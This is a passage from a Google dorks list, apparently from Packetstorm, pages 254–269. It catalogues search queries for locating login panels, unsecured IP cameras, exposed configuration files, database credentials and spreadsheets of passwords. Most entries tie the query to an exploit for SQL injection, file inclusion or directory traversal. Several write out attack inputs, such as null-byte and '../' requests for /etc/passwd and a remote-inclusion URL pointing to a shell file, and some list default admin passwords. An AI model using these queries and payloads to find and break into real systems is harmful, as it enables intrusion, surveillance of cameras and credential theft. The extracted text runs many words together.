Login pages forSHOUTcast"SHOUTcast is a free-of-charge audio homesteading solution. Itpermits anyone on the internet tobroadcast audio from their PC tolisteners across the Internet or anyother IP-based network (Office LANs,college campuses, etc.).SHOUTcast'sunderlying technology for audiodelivery is MPEG Layer 3, also knownas MP3 technology. The SHOUTcastsystem can deliver audio in a livesituation, or can deliver audio on-demand for archived broadcasts. "

intext:"TargetMulticast Group""beacon"

intext:"Target Multicast Group""beacon"

"... Multicast Beacon is a multicastdiagnostic tool written in Perl whichuses the RTP protocol (RFC3550) toprovide useful statistics and diagnosticinformation about a given multicastgroup's connectivitycharacteristics.Multicast is a way ofdistributing IP packets to a set ofmachines which have expressed aninterest in receiving them. It is a one-to-many distribution model suitable forvideo conferencing and other forms ofdata sharing over the network."seeh**p://beacon.dast.nlanr.net

(intitle:"Pleaselogin - Forumspowered byUBB.threads")|(inurl:login.php"ubb")

(intitle:"Please login - Forumspowered byUBB.threads")|(inurl:login.php"ubb")

Logins for Forums powered byUBB.threads

(intitle:"WmSC e-CartAdministration")|(intitle:"WebMyStyle e-CartAdministration")

(intitle:"WmSC e-CartAdministration")|(intitle:"WebMyStyle e-Cart Administration")

Login Pages forWebMyStyle."WebMyStyle offers afull range of web hosting and dedicatedserver plans, but also gives you theability to pick and choose the featuresthat you need for your web sites."

Page 254: Packetstorm Google Dorks List

intitle:"eXistDatabaseAdministration" -demo

intitle:"eXist DatabaseAdministration" -demo

Login Pages "eXist is an Open Sourcenative XML database featuringefficient, index-based XQueryprocessing, automatic indexing,extensions for full-text search,XUpdate support and tight integrationwith existing XML development tools.The database implements the currentXQuery 1.0 working draft as ofNovember, 2003 (for the core syntax,some details already following laterversions), with the exception of theXML schema related features."

intitle:"ApacheTomcat" "ErrorReport"

intitle:"Apache Tomcat" "ErrorReport"

Apache Tomcat Error messages. Thesecan reveal various kinds informationdepending on the type of error.

intext:"This site isusing phpGraphy"| intitle:"myphpgraphy site"

intext:"This site is usingphpGraphy" | intitle:"my phpgraphysite"

found this: a remote user can haveaccess to some edit functionalities to"modify" html. Impact: cross sitescripting, denial of servicereferences:http://retrogod.altervista.org/phpgraphy_0911_adv.htmlhttp://secunia.com/advisories/19705

intext:"Poweredby PCPIN.com" -site:pcpin.com -ihackstuff -"workswith" -findlaw

intext:"Powered by PCPIN.com" -site:pcpin.com -ihackstuff -"workswith" -findlaw

this is for PCPIN Chat SQLinjection/login bypass and arbitrarylocal inclusionreferences:http://retrogod.altervista.org/pcpin_504_xpl.htmlhttp://secunia.com/advisories/19708/

intitle:r57shell+uname -bbpress intitle:r57shell +uname -bbpress

compromised servers... a lot are deadlinks, but pages cached showinteresting info, this is r57shell.phpscript by Rush Security Team

intitle:"iGuardFingerprintSecurity System"

intitle:"iGuard Fingerprint SecuritySystem"

vendor:http://www.iguardus.com/domeinformation disclosure: employeers list& free camera access

intitle:"VeoObserver XT" -inurl:shtml|pl|php|htm|asp|aspx|pdf|cfm -intext:observer

intitle:"Veo Observer XT" -inurl:shtml|pl|php|htm|asp|aspx|pdf|cfm -intext:observer

just more results forthis:http://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=1348

(intitle:(EyeSpyFX|OptiCamFX) "goto

(intitle:(EyeSpyFX|OptiCamFX)"go tocamera")|(inurl:servlet/DetectBrows

just more cameras vendor site:http://www.eyespyfx.com/

Page 255: Packetstorm Google Dorks List

camera")|(inurl:servlet/DetectBrowser)

er)

intitle:"X7 ChatHelp Center" |"Powered By X7Chat" -milw0rm -exploit

intitle:"X7 Chat Help Center" |"Powered By X7 Chat" -milw0rm -exploit

this is for X7 Chat

inurl:cgi-bin/guestimage.html

inurl:cgi-bin/guestimage.html just more more MOBOTIX's

allinurl:tseekdir.cgi allinurl:tseekdir.cgi

tseekdir.cgi?location=FILENAME%00eg:tseekdir.cgi?location=/etc/passwd%00basically any file on the server canbe viewed by inserting a null (%00)into the URL.credit toduritohttp://seclists.org/bugtraq/2006/May/0184.html

intitle:"BadBlue:the file-sharingweb server anyonecan use"

intitle:"BadBlue: the file-sharingweb server anyone can use"

Badblue file sharing web serverdetection

Copyright .Nucleus CMSv3.22 . ValidXHTML 1.0 Strict. Valid CSS . Backto top -demo -"deadly eyes"

Copyright . Nucleus CMS v3.22 .Valid XHTML 1.0 Strict . ValidCSS . Back to top -demo -"deadlyeyes"

this is for Nucleus 3.22 CMS arbitraryremote inclusion advisory/poc exploit:http://retrogod.altervista.org/nucleus_322_incl_xpl.html

"powered bypppblog v 0.3.(.)" "powered by pppblog v 0.3.(.)"

this is for the pppblog 0.3.x systemdisclosure vulnerability, advisory/pocexploit:http://retrogod.altervista.org/pppblog_038_xpl.html

"Powered by PHP-Fusion v6.00.110"| "Powered byPHP-Fusionv6.00.2.." |"Powered by PHP-Fusion v6.00.3.." -v6.00.400 -johnny.ihackstuff

"Powered by PHP-Fusionv6.00.110" | "Powered by PHP-Fusion v6.00.2.." | "Powered byPHP-Fusion v6.00.3.." -v6.00.400 -johnny.ihackstuff

this the dork for theese PHP-Fusionexploits:http://retrogod.altervista.org/phpfusion_600306_xpl.htmlhttp://retrogod.altervista.org/phpfusion_600306_sql.html

Page 256: Packetstorm Google Dorks List

intitle:"XOOPSSite" intitle:"JustUse it!" | "poweredby xoops(2.0)|(2.0.....)"

intitle:"XOOPS Site" intitle:"JustUse it!" | "powered by xoops(2.0)|(2.0.....)"

this is the dork for the XOOPS 2.x'xoopsOption[nocommon]' overwritevulnerability, advisory & pocexploit:http://retrogod.altervista.org/xoops_20132_incl.html

inurl:wp-login.php+RegisterUsernamePassword"remember me" -echo -trac -footwear

inurl:wp-login.php +RegisterUsername Password "rememberme" -echo -trac -footwear

this is a bit different from the previousone in GHDB, it searches forWordpress 2.x sites where userregistration is enabled, a user can injecta carriage return and php code insidecache files to have a shell on targetsystemadvisory & poc exploit here:http://retrogod.altervista.org/wordpress_202_xpl.html

"powered byubbthreads" "powered by ubbthreads"

forums powered by ubbthreads arevulnerable to file inclusion.You can getmore results with yahoosearch.http://site.com/ubbthredspath//ubbt.inc.php?thispath=http://shell.txt?http://www.securityfocus.com/archive/1/archive/1/435288/100/0/threaded

intitle:"SNC-RZ30HOME" -demo intitle:"SNC-RZ30" -demo

This search will reveal Sony's SNC-RZ30 IP camera's web interface. Quitea few of these cameras have not beenconfigured to deny you control. Theseare not only cameras in the US but mayinclude cameras abroad.Including:University Security CamerasForeigngovernment camerasI've seen camerasmonitoring submarines.You may alsouse this in place of SNC-RZ30, butthey don't yield as many results.SNC-CS3 SNC-RZ25SNC-DF40 SNC-RZ30SNC-DF70 SNC-VL10SNC-P1SNC-Z20

allintitle:EverFocus | EDSR| EDSR400 Applet

allintitle: EverFocus | EDSR |EDSR400 Applet

Modified Everfocus search, pulls inEDSR400's as well s a few straysmissed by original query.

allintitle:Edr1680remote viewer allintitle:Edr1680 remote viewer

Everfocus EDR1680. Only returns 2 or3 results, but submitted forcompleteness sake.

allintitle:EDR1600 login |Welcome

allintitle: EDR1600 login |Welcome Everfocus EDR1600

Page 257: Packetstorm Google Dorks List

allintitle: EDR400login | Welcome allintitle: EDR400 login | Welcome Everfocus EDR400

FlashChat v4.5.7 FlashChat v4.5.7

This simple search brings up lots ofonline Flash Chat clients. Flash Chat'sadministration directory is alwaysfound by visiting /admin in the URL.Example:www.webaddress.com/flashChat/admin/The default Admin password is"adminpass" (Without the speechmarks).

intitle:"Divar WebClient" intitle:"Divar Web Client" Boshe/Divar Net Cameras. Uses

ActiveX - IE only.intitle:"Live View/ - AXIS" |inurl:view/view.shtml ORinurl:view/indexFrame.shtml |intitle:"MJPG LiveDemo" |"intext:Selectpreset position"

intitle:"Live View / - AXIS" |inurl:view/view.shtml ORinurl:view/indexFrame.shtml |intitle:"MJPG Live Demo" |"intext:Select preset position"

No one search will reveal all Axiscameras. This is my mod of one of thequeries. It usualy returns 990-1000 ofthe 1000 results google allows.

allintitle: Axis2.10 OR 2.12 OR2.30 OR 2.31 OR2.32 OR 2.33 OR2.34 OR 2.40 OR2.42 OR 2.43"Network Camera"

allintitle: Axis 2.10 OR 2.12 OR2.30 OR 2.31 OR 2.32 OR 2.33 OR2.34 OR 2.40 OR 2.42 OR 2.43"Network Camera "

No one search will reveal all Axiscameras. This is a variant for the 2xxxseries.

intitle:"BlueNetVideo Viewer" intitle:"BlueNet Video Viewer"

Near broadcast quality video over theinternet. A full 30fps at the 320 X 240size. 12fps at the 640 X 480 size. TheBlueNet video server will acceptvirtually any type of camera, wirelessreceivers, DVRs, multiplexes, etc.Display and access any security systemlive from anywhere in the worldutilizing the web. All you need is anInternet browser to view the image.Uses ActiveX.

intitle:"stingray ftslogin" | ( login.jsp

intitle:"stingray fts login" | (login.jsp intitle:StingRay )

The Stingray File Transfer Server:Open communication regardless of

Page 258: Packetstorm Google Dorks List

intitle:StingRay ) platform, protocol or location.Independant of operating systemarchitecture and the type ofcommunication line, StingRay enablesfast and simple file transfer.Login=user:(no password) oradmin:stingrayPS: only 1 result now.

intitle:Ampacheintitle:"love ofmusic" password |login | "RememberMe." -welcome

intitle:Ampache intitle:"love ofmusic" password | login |"Remember Me." -welcome

Ampache is a Web-basedMP3/Ogg/RM/Flac/WMA/M4Amanager. It allows you to view, edit,and play your audio files viaHTTP/IceCast/Mpd or Moosic. It hassupport for downsampling, playlists,artist, and album views, album art,random play, song play tracking, userthemes, and remote catalogs usingXML-RPC.

allintitle:"DVRlogin" allintitle:"DVR login"

softwell Technology "Wit-Eye"DVR.Default user/pass isadmin:adminRequires ActiveX

intitle:index.of.config intitle:index.of.config

These directories can give informationabout a web servers configuration. Thisshould never be viewable to the publicas some files may contain cleartext ofencrypted passwords, depending on thelevel of security. It can also containinformation on various ports, securitypermisions..etc.

site:extremetracking.cominurl:"login="

site:extremetracking.cominurl:"login="

The search reveals usernames (right inthe URL in green) and links to the sitesthat are signed up withextremetracking.com. From here anattacker can view any of the sites stats,including all the visitors to the site thatis being tracked, including their IPadresses.

"SurgeMAIL"inurl:/cgi/user.cgiext:cgi

"SurgeMAIL" inurl:/cgi/user.cgiext:cgi

surgemail is an email server fromnetwinsite.com that can be accessed bya web browser. This dork finds the weblogins.

intitle:"Login to@Mail" (ext:pl |inurl:"index") -dwaffleman

intitle:"Login to @Mail" (ext:pl |inurl:"index") -dwaffleman

Webmail is a http based email servermade by atmail.com. To get to theadmin login instead of the regular loginadd webadmin/ to the url.

Page 259: Packetstorm Google Dorks List

(intitle:"SilkyMailby CyrusoftInternational,Inc.")|(intitle:"Welcome toSilkyMail")|(intitle:"Willkommen beiSilkyMail")|(inurl:adv_login.php3)|(in

(intitle:"SilkyMail by CyrusoftInternational, Inc

silkyMail is a free internet email client,from www.cyrusoft.com, that runs inyour browser. The server can workwith apache or as a stand alone emailserver.The google query and url got cutoff, it should reallybe:(intitle:"SilkyMail by CyrusoftInternational, Inc.")|(intitle:"Welcometo SilkyMail")|(intitle:"WillkommenbeiSilkyMail")|(inurl:adv_login.php3)|(inurl:"silkymail/imp/login.php3")http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%28intitle%3A%22SilkyMail+by+Cyrusoft+International%2C+Inc.%22%29%7C%28intitle%3A%22Welcome+to+SilkyMail%22%29%7C%28intitle%3A%22Willkommen+bei+SilkyMail%22%29%7C%28inurl%3Aadv_login.php3%29%7C%28inurl%3A%22silkymail%2Fimp%2Flogin.php3%22%29&btnG=Search

ext:phpintext:"$dbms""$dbhost""$dbuser""$dbpasswd""$table_prefix""phpbb_installed"

ext:phpintext:"$dbms""$dbhost""$dbuser""$dbpasswd""$table_prefix""phpbb_installed"

Hacking a phpBB forum. Here you cangather the mySQL connectioninformation for their forum database.View the .php info by using Google'scache feature.

"Powered bysendcard - anadvanced PHP e-card program" -site:sendcard.org

"Powered by sendcard - anadvanced PHP e-card program" -site:sendcard.org

this is for Sendcard remote commandsexecution,advisory/ poc exploit:http://retrogod.altervista.org/sendcard_340_xpl.html

"powered by xmb" "powered by xmb" this is for XMB

"powered byminibb forumsoftware"

"powered by minibb forumsoftware"

This dork is for minibb forum softwarearbitrary remote inclusion. this is aboutthe unset() issue found by S. Esser:http://www.hardened-php.net/hphp/zend_hash_del_key_or_index_vulnerability.html Try this ccodes to calculate hashes if you wannatest the unset() vuln on some other app:http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=3944

Page 260: Packetstorm Google Dorks List

inurl:eStore/index.cgi? inurl:eStore/index.cgi?

this is for eStore directory traversal,exampleexploit:http://[target]/[path]/eStore/index.cgi?page=../../../../../../../../etc/passwd

"login: *""password: *"filetype:xls

"login: *" "password= *"filetype:xls

This returns xls files containing loginnames and passwords. it works byshowing all the xls files withpassword:(something)so a downside isthat u do get stuff like "passwordprotected", "password services" etc.(and the same for login)But...most ofthe decent ones have the login andpassword in the text given to you bygoogle, so its easy to seperate theuseful ones from the others.

inurl:+:8443/login.php3 inurl:+:8443/login.php3

Plesk is a multi platform control panelsolution for hosting.More information:hxxp://www.swsoft.com/plesk/Vulnerability: PLESK 7.5 Reload (and lower)& PLESK 7.6 for M$ Windows pathpassing and disclosure] Discovered By:GuanYu

inurl:wrcontrollite inurl:wrcontrollite Browse up to 16 security cameras atone time :)

"Powered by VsnsLemon"intitle:"VsnsLemon"

"Powered by Vsns Lemon"intitle:"Vsns Lemon"

hxxp://evuln.com/vulns/106/summary.html

inurl:"simplenews/admin" inurl:"simplenews/admin" hxxp://evuln.com/vulns/94/summary.ht

ml

inurl:"/?pagename=AdministratorLogin"

inurl:"/?pagename=AdministratorLogin"

Powered by Bariatric AdvantageAdminLogin:Admin login pages for whatlooks like an inhouse eshop. Noobvious public exploits but I'm surethere is a way WinkMore info foundhere:h**p://catalinalifesciences.com/Credit to cp for the clean up

inurl:"/?pagename=CustomerLogin" inurl:"/?pagename=CustomerLogin"

Customer login pages for what lookslike an inhouse eshop. Moreinformationhere:h**p://catalinalifesciences.com/Credit to cp for clean up.

"LANCOM "LANCOM DSL/*-* Office *" h**p://www.lancom-systems.de/Login

Page 261: Packetstorm Google Dorks List

DSL/*-* Office *""Entry Page"

"Entry Page" page for these Lancom online DSLdevices.

intitle:"AdventNetManageEngineServiceDesk Plus"intext:"RememberMe"

intitle:"AdventNet ManageEngineServiceDesk Plus"intext:"Remember Me"

serviceDesk Plus is a 100 % web-basedHelp Desk and Asset Managementsoftware.vendor:h**p://manageengine.adventnet.com/products/service-desk/index.htmlmanual:h**p://manageengine.adventnet.com/products/service-desk/help/adminguide/index.html

"Welcome to theCyberGuard unit!" "Welcome to the CyberGuard unit!"

"Welcome to the CyberGuard unit! Tobegin configuring your CyberGuardunit now, use the menu to the left, orthe Quick Setup Wizard .." :)

"SnapGearManagementConsole""Welcome to theSnapGear Unit!" -pdf

"SnapGear Management Console""Welcome to the SnapGear Unit!" -pdf

"Welcome to the SnapGear Unit! Tobegin configuring your SnapGear unitnow, use the menu to the left, or theQuick Setup Wizard .." :)PS: thissoftware looks very much likeCyberguard.

intitle:"YourNetwork Device"Status (LAN |WAN)

intitle:"Your Network Device"Status (LAN | WAN)

Login page for the Solwise Sar715+ADSL Router from solwise.co.uk.Thanks to jeffball55 for theidentification of this "victim" ;)

intitle:Top"Vantage ServiceGateway" -inurl:zyxel

intitle:Top "Vantage ServiceGateway" -inurl:zyxel

VSG1200 Vantage Service Gateway(topframe), go up one level for thelogin page. Vendor page ath**p://www.i-tech.com.au/products/7828_ZYXEL_VSG_1200_Vantage_Service_Management.asp

intitle:"AppServOpen Project *""AppServ is amerging opensource softwareinstaller package"-phpbb

intitle:"AppServ Open Project *""AppServ is a merging open sourcesoftware installer package" -phpbb

Often includes phpinfo and unsecuredlinks to phpmyadmin.

intitle:ARI "PhoneSystemAdministrator"

intitle:ARI "Phone SystemAdministrator"

Login page for "Asterisk RecordingInterface" (ARI).

allintext:"WebServerX Server at" allintext:"WebServerX Server at" Quick and dirty WebserverX HTTP

server google dork

Page 262: Packetstorm Google Dorks List

allintitle:"SyncThru Web Service" allintitle:"SyncThru Web Service" This search finds Internet-connected

Samsung printer control panels.

allinurl:com_pccookbook allinurl:com_pccookbook

Joomla Component com_pccookbook(user_id) SQL Injection Vulnerability -CVE: 2008-0844: http://www.exploit-db.com/exploits/5145

inurl:"section.php?name=singers" inurl:"section.php?name=singers"

6rbScript 3.3 (section.php name) LocalFile Inclusion Vulnerability - CVE:2008-6453: http://www.exploit-db.com/exploits/6520

Powered by v1.14powered byphilboard v1.14

Powered by v1.14 powered byphilboard v1.14

W1L3D4 Philboard 1.2 (BlindSQL/XSS) Multiple RemoteVulnerabilities - CVE: 2008-5192:http://www.exploit-db.com/exploits/5958

inurl:index.php%"Submit%Articles"%"Member%Login"%"Top%Authors"

inurl:index.php%"Submit%Articles"%"Member%Login"%"Top%Authors"

Article Directory (index.php page)Remote File Inclusion Vulnerability -CVE: 2007-4007: http://www.exploit-db.com/exploits/4221

allinurl:"wordspew-rss.php"

allinurl: "wordspew-rss.php"

Wordpress Plugin Wordspew RemoteSQL Injection Vulnerability - CVE:2008-0682: http://www.exploit-db.com/exploits/5039

allinurl:com_clasifier allinurl: com_clasifier

Joomla Component com_clasifier(cat_id) SQL Injection Vulnerability -CVE: 2008-0842: http://www.exploit-db.com/exploits/5146

allinurl:"com_galeria" allinurl: "com_galeria"

Joomla Component com_galeriaRemote SQL Injection Vulnerability -CVE: 2008-0833: http://www.exploit-db.com/exploits/5134

Powered byhwdVideoShare Powered by hwdVideoShare

Joomla Componentcom_hwdvideoshare SQL InjectionVulnerability - CVE: 2008-0916:http://www.exploit-db.com/exploits/5160

allinurl: modules-php-name-Siir allinurl: modules-php-name-Siir

PHP-Nuke Module Siir (id) RemoteSQL Injection Vulnerability:http://www.exploit-db.com/exploits/5169

allinurl: id"com_jooget" allinurl: id "com_jooget" Joomla Component jooget

Page 263: Packetstorm Google Dorks List

allinurl:"modules/wfdownloads/viewcat.php?cid"

allinurl:"modules/wfdownloads/viewcat.php?cid"

XOOPS Module wfdownloads (cid)Remote SQL Injection Vulnerability:http://www.exploit-db.com/exploits/5218

allinurl:"modules/eEmpregos/index.php"

allinurl:"modules/eEmpregos/index.php"

XOOPS Module eEmpregos (cid)Remote SQL Injection Vulnerability -CVE: 2008-0874: http://www.exploit-db.com/exploits/5157

Powered by ActivePHP Bookmarksv1.1.02

Powered by Active PHPBookmarks v1.1.02

Active PHP Bookmarks 1.1.02 RemoteSQL Injection Vulnerability - CVE:2008-3748: http://www.exploit-db.com/exploits/6277

powered by SiteSift powered by Site Sift

Site Sift Listings (id) Remote SQLInjection Vulnerability - CVE: 2008-1869: http://www.exploit-db.com/exploits/5383

"Create your ownfree webring andbring traffic toyour website. Joinnow, it's free!"

"Create your own free webring andbring traffic to your website. Joinnow, it's free!"

Prozilla Webring Website Script(category.php cat) Remote SQLInjection - CVE: 2007-4362:http://www.exploit-db.com/exploits/4284

inurl:com_joomladate inurl:com_joomladate

Joomla Component JoomlaDate (user)SQL injection Vulnerability - CVE:2008-6068: http://www.exploit-db.com/exploits/5748

"powered byILIAS" "powered by ILIAS"

ILIAS 3.7.4 (ref_id) Blind SQLInjection Vulnerability - CVE: 2008-5816: http://www.exploit-db.com/exploits/7570

allinurl:"index.php?option=com_doc"

allinurl:"index.php?option=com_doc"

Joomla Component com_doc RemoteSQL Injection Vulnerability - CVE:2008-0772: http://www.exploit-db.com/exploits/5080

Powered by GL-SH DEAF forum6.5.5 final.

Powered by GL-SH DEAF forum6.5.5 final.

PHP Forum ohne My SQL Remote FileUpload Vulnerability:http://www.exploit-db.com/exploits/10757

inurl:com_simpleshop inurl:com_simpleshop

Joomla Component simpleshop 3.4SQL injection Vulnerability - CVE:2008-2568: http://www.exploit-db.com/exploits/5743

inurl:"index.php?pageid=" Property

inurl:"index.php?pageid=" PropertyListings

Realtor 747 (index.php categoryid)Remote SQL Injection Vulnerbility -

Page 264: Packetstorm Google Dorks List

Listings CVE: 2007-3810: http://www.exploit-db.com/exploits/4184

"Powered bySmoothflash" "Powered by Smoothflash"

Smoothflash (admin_view_image.phpcid) SQL Injection Vulnerability -CVE: 2008-1623: http://www.exploit-db.com/exploits/5322

display_blog.php display_blog.php

Social Site Generator (sgc_id) RemoteSQL Injection Vulnerability - CVE:2008-6419: http://www.exploit-db.com/exploits/5701

Snipe Galleryv.3.1.5 bySnipe.Net

Snipe Gallery v.3.1.5 by Snipe.Netsnipe gallery Script Sql Injection:http://www.exploit-db.com/exploits/14053

Powered byAspDownload Powered by AspDownload

ASP Download 1.03 Arbitrary ChangeAdministrator Account Vulnerability -CVE: 2008-6739: http://www.exploit-db.com/exploits/5780

DA Mailing ListSystem V2Powered byDigitalArakan.Net

DA Mailing List System V2Powered by DigitalArakan.Net

DA Mailing List System V2 MultipleVulnerabilities: http://www.exploit-db.com/exploits/11348

Powered By AJAuction Web Powered By AJ Auction Web

AJ Auction Web 2.0 (cate_id) SQLInjection Vulnerability - CVE: 2008-2860: http://www.exploit-db.com/exploits/5867

''showad.php?listingid='' ''showad.php?listingid=''

BM Classifieds 20080409 MultipleSQL Injection Vulnerabilities - CVE:2008-1272: http://www.exploit-db.com/exploits/5223

"Powered by MyPHP Indexer 1.0" "Powered by My PHP Indexer 1.0"

My PHP Indexer 1.0 (index.php) LocalFile Download Vulnerability - CVE:2008-6183: http://www.exploit-db.com/exploits/6740

allinurl:"com_rapidrecipe"user_id

allinurl: "com_rapidrecipe"user_id

Joomla Component rapidrecipe 1.6.5SQL Injection Vulnerability - CVE:2008-0754: http://www.exploit-db.com/exploits/5103

allinurl:"modules/dictionary"

allinurl: "modules/dictionary"

XOOPS Module Dictionary 0.94Remote SQL Injection Vulnerability:http://www.exploit-db.com/exploits/5267

"RS MAXSOFT" "RS MAXSOFT" RX Maxsoft (popup_img.php fotoID)

Page 265: Packetstorm Google Dorks List

Remote SQL Injection Vulnerability -CVE: 2008-4912: http://www.exploit-db.com/exploits/5426

"2007RADIOZAZAwww.radiozaza.de? istek hattiVersion 2.5"

"2007 RADIOZAZAwww.radiozaza.de? istek hattiVersion 2.5"

Radio istek scripti 2.5 RemoteConfiguration Disclosure Vulnerability- CVE: 2009-4096: http://www.exploit-db.com/exploits/10231

allinurl:"index.php?p=poll"showresult

allinurl:"index.php?p=poll"showresult

Koobi Pro 6.25 poll Remote SQLInjection Vulnerability - CVE: 2008-2036: http://www.exploit-db.com/exploits/5448

allinurl:"com_joovideo"detail

allinurl: "com_joovideo" detail

Joomla Component joovideo 1.2.2 (id)SQL Injection Vulnerability - CVE:2008-1460: http://www.exploit-db.com/exploits/5277

content_by_cat.asp?contentid ''catid''

content_by_cat.asp?contentid''catid''

ASPapp Knowledge Base Remote SQLInjection Vulnerability - CVE: 2008-1430: http://www.exploit-db.com/exploits/5286

Powered ByAlstraSoft VideoShare Enterprise

Powered By AlstraSoft Video ShareEnterprise

AlstraSoft Video Share Enterprise4.5.1 (UID) SQL InjectionVulnerability - CVE: 2008-3386:http://www.exploit-db.com/exploits/6092

"Powered by PGReal EstateSolution - realestate web sitedesign"

"Powered by PG Real EstateSolution - real estate web sitedesign"

PG Real Estate (Auth Bypass) SQLInjection Vulnerability - CVE: 2008-5306: http://www.exploit-db.com/exploits/7200

"Powered by PGRoomate FinderSolution -roommate estateweb site design"

"Powered by PG Roomate FinderSolution - roommate estate web sitedesign"

PG Roomate Finder Solution (AuthBypass) SQL Injection Vulnerability -CVE: 2008-5307: http://www.exploit-db.com/exploits/7201

allinurl:com_pcchess"user_id"

allinurl: com_pcchess "user_id"

Joomla Component pcchess 0.8Remote SQL Injection Vulnerability -CVE: 2008-0761: http://www.exploit-db.com/exploits/5104

Powered by PHPupload - unijimpe. Powered by PHP upload - unijimpe.

PHP upload - (unijimpe) Remote FileUpload Vulnerability:http://www.exploit-db.com/exploits/10732

Page 266: Packetstorm Google Dorks List

"Powered byFubarForum v1.6" "Powered by FubarForum v1.6"

FubarForum 1.6 Arbitrary AdminBypass Vulnerability:http://www.exploit-db.com/exploits/7595

inurl:cfaq/index.php?catid= inurl:cfaq/index.php?catid=

FAQ Management Script (catid)Remote SQL Injection Vulnerability -CVE: 2008-4743: http://www.exploit-db.com/exploits/6629

''nameKose_Yazilari opviewarticle artid''

''name Kose_Yazilari op viewarticleartid''

PHP-Nuke Module Kose_Yazilari(artid) SQL Injection Vulnerability -CVE: 2008-1053: http://www.exploit-db.com/exploits/5186

inurl:modifyform.html?code=

inurl: modifyform.html?code=

modifyform (modifyform.html)Remote File Inclusion Vulnerability:http://www.exploit-db.com/exploits/4423

allinurl:com_ricette allinurl: com_ricette

Mambo Component Ricette 1.0Remote SQL Injection Vulnerability -CVE: 2008-0841: http://www.exploit-db.com/exploits/5133

out.php?linkid=1 out.php?linkid=1

Link ADS 1 (out.php linkid) RemoteSQL Injection Vulnerability:http://www.exploit-db.com/exploits/5930

allinurl:"com_garyscookbook" allinurl:"com_garyscookbook"

Mambo Component garyscookbook1.1.1 SQL Injection Vulnerability -CVE: 2008-1137: http://www.exploit-db.com/exploits/5178

inurl:"index.php?conteudo=" inurl:"index.php?conteudo="

Waibrasil Remote / Local FileInclusion: http://www.exploit-db.com/exploits/12562

inurl:"section.php?name=singers" inurl:"section.php?name=singers"

6rbScript 3.3 (singerid) Remote SQLInjection Vulnerability - CVE: 2008-6454: http://www.exploit-db.com/exploits/6511

inurl:cat1.php?catID= "Spaceacre" inurl:cat1.php?catID= "Spaceacre"

Spaceacre (index.php)SQL/HTML/XSS InjectionVulnerability: http://www.exploit-db.com/exploits/12756

"Powered byFubarForum v1.6" "Powered by FubarForum v1.6"

FubarForum 1.6 Admin BypassChange User Password Vulnerability:http://www.exploit-db.com/exploits/7606

Page 267: Packetstorm Google Dorks List

inurl:comment.aspintext:Your e-mailaddress will beused to send youvoting andcomment activity.Inclusion of youraddress is optionalbut Battle Blogcannot notify youof these activitiesunless you supplyan accurate e-mail.

inurl:comment.asp intext:Your e-mail address will be used to sendyou voting and comment activity.Inclusion of your address is optionalbut Battle Blog cannot notify you ofthese activities unless you supply anaccurate e-mail.

Battle Blog 1.25 Auth Bypass SQLInjection / HTML Injection Vulns -CVE: 2009-3718: http://www.exploit-db.com/exploits/9183

inurl:com_img inurl:com_imgJoomla Component (com_img) LFIVulnerability: http://www.exploit-db.com/exploits/15470

details.php?p_id= details.php?p_id=

The iceberg 'Content ManagementSystem' SQL Injection Vulnerability -CVE: 2010-2016: http://www.exploit-db.com/exploits/12620

allinurl:"modules/photo/viewcat.php?id"

allinurl:"modules/photo/viewcat.php?id"

RunCMS Module Photo 3.02 (cid)Remote SQL Injection Vulnerability -CVE: 2008-1551: http://www.exploit-db.com/exploits/5290

powered by 35mmSlide Gallery powered by 35mm Slide Gallery

35mm Slide Gallery DirectoryTraversal Vulnerability:http://www.exploit-db.com/exploits/10614

allinurl:"com_simpleshop" allinurl:"com_simpleshop"

Joomla Component simple shop 2.0SQL Injection Vulnerability:http://www.exploit-db.com/exploits/5177

powered byvBulletin 3.8.4 powered by vBulletin 3.8.4

vBulletin 3.8.4 & 3.8.5 RegistrationBypass Vulnerability:http://www.exploit-db.com/exploits/14833

intitle:WebCalendar system v3.30 inurl:.asp

intitle:Web Calendar system v 3.30inurl:.asp

Web Calendar System 3.12/3.30Multiple Remote Vulnerabilities -CVE: 2004-1552: http://www.exploit-db.com/exploits/7242

inurl:index.php?page=en_jobseekers

inurl:index.php?page=en_jobseekers

JobSite Professional 2.0 file.phpRemote SQL Injection Vulnerability -CVE: 2007-5785: http://www.exploit-

Page 268: Packetstorm Google Dorks List

db.com/exploits/4576

webwizguestbook_license.asp webwizguestbook_license.asp

Web Wiz Guestbook 8.21(WWGguestbook.mdb) DDVulnerability - CVE: 2003-1571:http://www.exploit-db.com/exploits/7488

allinurl: aid"com_xfaq" allinurl: aid "com_xfaq"

Joomla Component xfaq 1.2 (aid)Remote SQL Injection Vulnerability -CVE: 2008-0795: http://www.exploit-db.com/exploits/5109

inurl:modules/flashgames/ inurl:modules/flashgames/

XOOPS Flashgames Module 1.0.1Remote SQL Injection Vulnerability -CVE: 2007-2543: http://www.exploit-db.com/exploits/3849

inurl:index.php?option=com_mediaslide

inurl:index.php?option=com_mediaslide

Joomla Component com_mediaslideDirectory Traversal Vulnerability:http://www.exploit-db.com/exploits/10591

inurl:"com_biblestudy" inurl:"com_biblestudy"

Joomla Component com_biblestudyLFI Vulnerability - CVE: 2010-0157:http://www.exploit-db.com/exploits/10943

inurl:"com_dashboard" inurl:"com_dashboard"

Joomla Component com_dashboardDirectory Traversal:http://www.exploit-db.com/exploits/11086

inurl:"com_jcollection " inurl:"com_jcollection "

Joomla Component com_jcollectionDirectory Traversal - CVE: 2010-0944:http://www.exploit-db.com/exploits/11088

"Affiliate NetworkPro" "Affiliate Network Pro"

AlstraSoft Affiliate Network Pro (pgm)Remote SQL Injection Vulnerability -CVE: 2008-3240: http://www.exploit-db.com/exploits/6087

index.php?option=com_pcchess index.php?option=com_pcchess

PrinceClan Chess Mambo Com 0.8Remote Inclusion Vulnerability - CVE:2006-5044: http://www.exploit-db.com/exploits/2069

Powered By:Forest Blog v1.3.2 Powered By: Forest Blog v1.3.2

Forest Blog 1.3.2 (blog.mdb) RemoteDatabase Disclosure Vulnerability -CVE: 2008-5780: http://www.exploit-db.com/exploits/7466

Page 269: Packetstorm Google Dorks List

intext:"Poweredby phpFastNews" intext:"Powered by phpFastNews"

phpFastNews 1.0.0 Insecure CookieHandling Vulnerability - CVE: 2008-4622: http://www.exploit-db.com/exploits/6779

Powered byphpDatingClub Powered by phpDatingClub

phpDatingClub (website.php page)Local File Inclusion Vulnerability -CVE: 2008-3179: http://www.exploit-db.com/exploits/6037

"Powered by:Censura" "Powered by: Censura"

